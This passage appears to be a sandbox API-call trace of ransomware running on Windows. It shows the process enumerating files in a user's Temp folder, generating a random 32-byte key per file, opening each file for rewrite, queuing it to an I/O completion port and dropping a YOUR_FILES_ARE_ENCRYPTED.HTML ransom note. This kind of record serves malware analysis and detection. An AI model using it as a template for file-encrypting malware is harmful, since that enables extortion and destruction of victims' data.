lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x100d3930, ftCreationTime.dwHighDateTime=0x1d7d859, ftLastAccessTime.dwLowDateTime=0xa756b80, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0xa756b80, 
ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x71ab, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="u47c.docx", cAlternateFileName="U47C~1.DOC")) returned 1 [0164.278] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx") returned 52 [0164.279] lstrcmpW (lpString1="u47c.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.279] PathFindExtensionW (pszPath="u47c.docx") returned=".docx" [0164.279] lstrlenW (lpString=".docx") returned 5 [0164.279] PathFindExtensionW (pszPath="u47c.docx") returned=".docx" [0164.279] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\u47c.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0164.279] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=29099) returned 1 [0164.279] GetProcessHeap () returned 0x270000 [0164.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8708 [0164.283] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="3B") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="DB") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0E") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="7C") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="BF") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DB") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1F") 
returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="BF") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D8") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E7") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F5") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="84") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="7B") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="64") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="D8") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="44") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="A4") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D8") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="30") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="2F") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="B2") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="86") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="46") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="34") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D0") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E9") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="44") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="84") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd79a, 
param_2="%02X" | out: param_1="A1") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A2") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D4") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="41") returned 2 [0164.284] lstrcpyW (in: lpString1=0x76c87bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx" [0164.284] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8708, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.284] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8708, lpOverlapped=0x76b8708) returned 1 [0164.284] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec9ba9d0, ftCreationTime.dwHighDateTime=0x1d7dc83, ftLastAccessTime.dwLowDateTime=0x93e8e3e0, ftLastAccessTime.dwHighDateTime=0x1d7e230, ftLastWriteTime.dwLowDateTime=0x93e8e3e0, ftLastWriteTime.dwHighDateTime=0x1d7e230, nFileSizeHigh=0x0, nFileSizeLow=0x1671a, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="vuZUNZYfHxr7qOv1nIea.wav", cAlternateFileName="VUZUNZ~1.WAV")) returned 1 [0164.285] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav") returned 67 [0164.285] lstrcmpW (lpString1="vuZUNZYfHxr7qOv1nIea.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.285] PathFindExtensionW (pszPath="vuZUNZYfHxr7qOv1nIea.wav") returned=".wav" [0164.285] lstrlenW (lpString=".wav") returned 4 [0164.285] PathFindExtensionW (pszPath="vuZUNZYfHxr7qOv1nIea.wav") returned=".wav" [0164.285] 
SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\vuzunzyfhxr7qov1niea.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d0 [0164.285] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91930) returned 1 [0164.285] GetProcessHeap () returned 0x270000 [0164.285] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e0860 [0164.289] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="DC") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="5E") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="D7") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="2F") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="00") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="76") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="7E") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="23") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="90") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CC") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="18") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="5B") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="22") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: 
param_1="46") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="EC") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4A") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E6") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D0") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="06") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="1C") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="8E") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="F7") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B5") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="E2") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="30") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="82") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AD") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="8E") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="67") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B9") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="5B") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="71") returned 2 [0164.290] lstrcpyW (in: lpString1=0x76f0914, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav" [0164.290] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x3a0, CompletionKey=0x76e0860, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.290] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e0860, lpOverlapped=0x76e0860) returned 1 [0164.290] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeed4c470, ftCreationTime.dwHighDateTime=0x1d7d963, ftLastAccessTime.dwLowDateTime=0x8f22abc0, ftLastAccessTime.dwHighDateTime=0x1d7d989, ftLastWriteTime.dwLowDateTime=0x8f22abc0, ftLastWriteTime.dwHighDateTime=0x1d7d989, nFileSizeHigh=0x0, nFileSizeLow=0x27ab, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="W4Xv9jzg2KbFjS-q_dpx.ppt", cAlternateFileName="W4XV9J~1.PPT")) returned 1 [0164.290] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt") returned 67 [0164.290] lstrcmpW (lpString1="W4Xv9jzg2KbFjS-q_dpx.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.291] PathFindExtensionW (pszPath="W4Xv9jzg2KbFjS-q_dpx.ppt") returned=".ppt" [0164.291] lstrlenW (lpString=".ppt") returned 4 [0164.291] PathFindExtensionW (pszPath="W4Xv9jzg2KbFjS-q_dpx.ppt") returned=".ppt" [0164.291] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\w4xv9jzg2kbfjs-q_dpx.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d4 [0164.291] GetFileSizeEx (in: 
hFile=0x5d4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=10155) returned 1 [0164.291] GetProcessHeap () returned 0x270000 [0164.291] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77089b8 [0164.295] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="6C") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0E") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="35") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="63") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="7C") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="FC") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="71") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E8") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="00") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="77") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="06") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="57") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="D0") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E6") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="DD") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="DE") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="80") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FF") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="22") returned 2 [0164.295] wsprintfW (in: 
param_1=0x4ebd776, param_2="%02X" | out: param_1="61") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="42") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="B9") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="A6") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="5E") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="57") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="5B") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="00") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="97") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="CC") returned 2 [0164.296] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B3") returned 2 [0164.296] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="99") returned 2 [0164.296] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="72") returned 2 [0164.296] lstrcpyW (in: lpString1=0x7718a6c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt" [0164.296] CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x3a0, CompletionKey=0x77089b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.296] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77089b8, lpOverlapped=0x77089b8) returned 1 [0164.296] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, 
ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0164.296] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE") returned 49 [0164.296] GetProcessHeap () returned 0x270000 [0164.296] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0164.296] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE" [0164.297] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\*" [0164.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfeda55, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.302] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, 
ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfeda55, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.302] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfeda55, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0164.302] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.303] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0164.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\wpdnse\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0164.303] WriteFile (in: hFile=0x5d8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.305] CloseHandle (hObject=0x5d8) returned 1 [0164.305] GetProcessHeap () returned 0x270000 [0164.307] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.307] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | 
out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2bd7d20, ftCreationTime.dwHighDateTime=0x1d7e46f, ftLastAccessTime.dwLowDateTime=0xa8b43a30, ftLastAccessTime.dwHighDateTime=0x1d7e61e, ftLastWriteTime.dwLowDateTime=0xa8b43a30, ftLastWriteTime.dwHighDateTime=0x1d7e61e, nFileSizeHigh=0x0, nFileSizeLow=0x7d4b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="y S-BBqSytXN.png", cAlternateFileName="YS-BBQ~1.PNG")) returned 1 [0164.307] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png") returned 59 [0164.307] lstrcmpW (lpString1="y S-BBqSytXN.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.307] PathFindExtensionW (pszPath="y S-BBqSytXN.png") returned=".png" [0164.307] lstrlenW (lpString=".png") returned 4 [0164.307] PathFindExtensionW (pszPath="y S-BBqSytXN.png") returned=".png" [0164.307] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\y s-bbqsytxn.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0164.307] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=32075) returned 1 [0164.307] GetProcessHeap () returned 0x270000 [0164.307] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7730b10 [0164.311] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="64") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="91") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="94") returned 2 [0164.311] wsprintfW (in: 
param_1=0x4ebd736, param_2="%02X" | out: param_1="44") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="73") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="5C") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="12") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="7E") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="82") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="56") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="79") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="C3") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B8") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E8") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="F2") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CE") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="6B") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="DE") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="C8") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="1E") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="65") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="86") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="88") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9C") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7B") returned 2 
[0164.312] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B3") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="91") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="FE") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7D") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="EB") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="17") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4E") returned 2 [0164.313] lstrcpyW (in: lpString1=0x7740bc4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png" [0164.313] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x7730b10, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.313] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7730b10, lpOverlapped=0x7730b10) returned 1 [0164.313] FindNextFileW (in: hFindFile=0x42f31c0, 